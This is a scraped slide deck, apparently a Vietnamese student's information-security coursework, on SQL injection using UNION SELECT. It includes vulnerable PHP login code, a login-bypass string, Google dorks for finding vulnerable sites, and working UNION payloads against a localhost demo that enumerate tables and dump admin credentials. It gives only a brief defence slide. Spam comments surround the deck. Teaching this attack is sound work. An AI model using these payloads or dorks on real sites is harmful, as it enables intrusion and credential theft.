Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Tấn công sql injection sử dụng câu lệnh select union

12,443 views

Published on

Tấn công sql injection sử dụng câu lệnh select union - Đề tài môn an toàn thông tin

Published in: Education
  • If you are looking for customer-oriented academic and research paper writing service try ⇒⇒⇒ WRITE-MY-PAPER.net ⇐⇐⇐ liked them A LOTTT Really nice solutions for the last-day papers
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Dating for everyone is here: ❤❤❤ http://bit.ly/2Q98JRS ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Follow the link, new dating source: ❶❶❶ http://bit.ly/2Q98JRS ❶❶❶
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DỊCH VỤ THIẾT KẾ THUYẾT TRÌNH (Thiết kế profile cho doanh nghiệp--- Thiết kế Brochure--- Thiết kế Catalogue--- slide bài giảng--- slide bài phát biểu---slide bài tốt nghiệp--- dạy học viên thiết kế thuyết trình…)-----(Giá từ 8.000 đ - 10.000 đ/1trang slide)------ Mọi chi tiết vui lòng liên hệ với chúng tôi: điện thoại 0973.764.894 hoặc zalo 0973.764.894 (Miss. Huyền) ----- • Thời gian hoàn thành: 1-2 ngày sau khi nhận đủ nội dung ----- Qui trình thực hiện: ----- 1. Bạn gửi nội dung cần thiết kế về địa chỉ email dvluanvan@gmail.com ----- 2. DỊCH VỤ THIẾT KẾ THUYẾT TRÌNH báo giá chi phí và thời gian thực hiện cho bạn ----- 3. Bạn chuyển tiền tạm ứng 50% chi phí để tiến hành thiết kế ----- 4. Gửi file slide demo cho bạn xem để thống nhất chỉnh sửa hoàn thành. ----- 5. Bạn chuyển tiền 50% còn lại. ----- 6. Bàn giao file gốc cho bạn.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • code demo
    https://docs.google.com/file/d/0BxJ_atuN0WwjZzBSc1NoVVRBZU0/edit
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Tấn công sql injection sử dụng câu lệnh select union

  1. 1. Nguyễn Danh Thanh TẤN CÔNG SQL INJECTION QUA CÂU LỆNH SELECT, UNION
  2. 2. Nội dung • Mục đích tấn công • Cơ chế tấn công • Phương thức tấn công • Cách phòng chống • Demo
  3. 3. Mục đích tấn công • Đánh cắp dữ liệu từ web server • Thay đổi dữ liệu • Deface website • Backdoor
  4. 4. Nội dung • Mục đích tấn công • Cơ chế tấn công • Phương thức tấn công • Cách phòng chống • Demo
  5. 5. Cơ chế tấn công
  6. 6. • Lợi dụng lỗ hổng trong việc kiểm tra thông tin đầu vào <form action="" method="post"> Tài khoản: <input type="text" name=“user"> Mật khẩu: <input type="password" name=“pass"> <input type="submit“ value=“Đăng nhập”> </form> <?php $user=$_POST[‘user’]; $pass=$_POST[‘pass’]; $sql=“SELECT * FROM tbl_user WHERE user=‘$user’ && pass=‘$pass’”; $query=mysql_query($sql);
  7. 7. $sql=“SELECT * FROM tbl_user WHERE user=‘0’ or ‘1’=‘1’--’ && pass=‘123456’”;
  8. 8. • Thông báo lỗi của hệ quản trị CSDL – Mysql_fetch_array(); – Database query failed… – You have an error in your SQL systax…
  9. 9. Nội dung • Mục đích tấn công • Cơ chế tấn công • Phương thức tấn công • Cách phòng chống • Demo
  10. 10. Phương thức tấn công • Các dork ( Từ khóa tìm site bị lỗi) – index.php?id= – news.php id= – article.php?id= – games.php?id= – opinions.php?id= – pages.php?id= – prod_detail.php?id= – view.php?id= ………….
  11. 11. • Các bước tấn công sử dụng lệnh union select – Kiểm tra lỗi sql injection. – Tìm số cột mà câu truy vấn tạo ra. – Tìm cột chứa thông tin có thể khai thác được. – Xem phiên bản của CSDL và ngôn ngữ lập trình. – Xác định tên bảng chứa thông tin người quản trị. – Xác định tài khoản/mật khẩu của quản trị. – Truy cập vào phần giành cho quản trị viên.
  12. 12. Nội dung • Mục đích tấn công • Cơ chế tấn công • Phương thức tấn công • Cách phòng chống • Demo
  13. 13. Cách phòng chống • Phòng chống từ mức xây dựng mã nguồn ứng dụng – Whilelist – Backlist • Bảo vệ từ mức nền tảng của hệ thống
  14. 14. Nội dung • Mục đích tấn công • Cơ chế tấn công • Phương thức tấn công • Cách phòng chống • Demo
  15. 15. Demo • Công cụ hỗ trợ – Add-on hackBar. – Web Admin Finder V2.0. – Google.
  16. 16. Mục tiêu tấn công
  17. 17. Tìm số cột mà câu truy vấn SQL tạo ra http://localhost/maytinh/?frame=product_detail&id=289 order by 15-- -
  18. 18. Xác định vị trí xảy ra lỗi http://localhost/maytinh/?frame=product_detail&id=-289 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
  19. 19. Xác định phiên bản ngôn ngữ lập trình http://localhost/maytinh/?frame=product_detail&id=-289 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15--
  20. 20. Xác định tên các bảng trong CSDL http://localhost/maytinh/?frame=product_detail&id=-289 union select 1,2,3,4,5,unhex(hex(group_concat('n',table_name))),7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--
  21. 21. Xác đinh các cột trong bảng tbl_user http://localhost/maytinh/?frame=product_detail&id=-289 union select 1,2,3,4,5,unhex(hex(group_concat('n',column_name))),7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x74626c5f75736572--
  22. 22. Xác định thông tin username, password của Admin http://localhost/maytinh/?frame=product_detail&id=-289 union select 1,2,3,4,5,unhex(hex(group_concat(id,0x7c,uid,0x7c,pwd))), 7,8,9,10,11,12,13,14,15 from tbl_user--
  23. 23. Password: thietkewebx.net
  24. 24. Tìm đường dẫn trang quản trị Localhost/maytinh/admin

×